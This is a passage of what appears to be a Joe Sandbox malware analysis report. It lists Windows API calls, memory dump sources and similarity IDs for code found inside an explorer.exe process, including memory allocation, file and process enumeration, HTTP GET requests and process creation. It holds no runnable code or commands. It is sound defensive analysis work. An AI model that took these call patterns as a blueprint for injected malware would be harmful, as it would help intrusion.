                                                                                                                                                                                                                                                                        • Part of subcall function 030582B4: NtFreeVirtualMemory.NTDLL ref: 030582E5
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                                                                                                                                                                      • String ID: h
                                                                                                                                                                                                                                                                      • API String ID: 30365702-2439710439
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateFileInitStringUnicode
                                                                                                                                                                                                                                                                      • String ID: 0$@
                                                                                                                                                                                                                                                                      • API String ID: 2498367268-1545510068
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 0305B388: NtAllocateVirtualMemory.NTDLL ref: 0305B3BE
                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32 ref: 03052BE7
                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 03052CAD
                                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32 ref: 03052CDA
                                                                                                                                                                                                                                                                      • FindClose.KERNEL32 ref: 03052CED
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 65906682-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Version
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Internet$CloseHandle$ConnectHttpOpenRequest
                                                                                                                                                                                                                                                                      • String ID: GET
                                                                                                                                                                                                                                                                      • API String ID: 830097650-1805413626
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Internet$CloseHandle$Open
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                                                                                                                                                                      • String ID: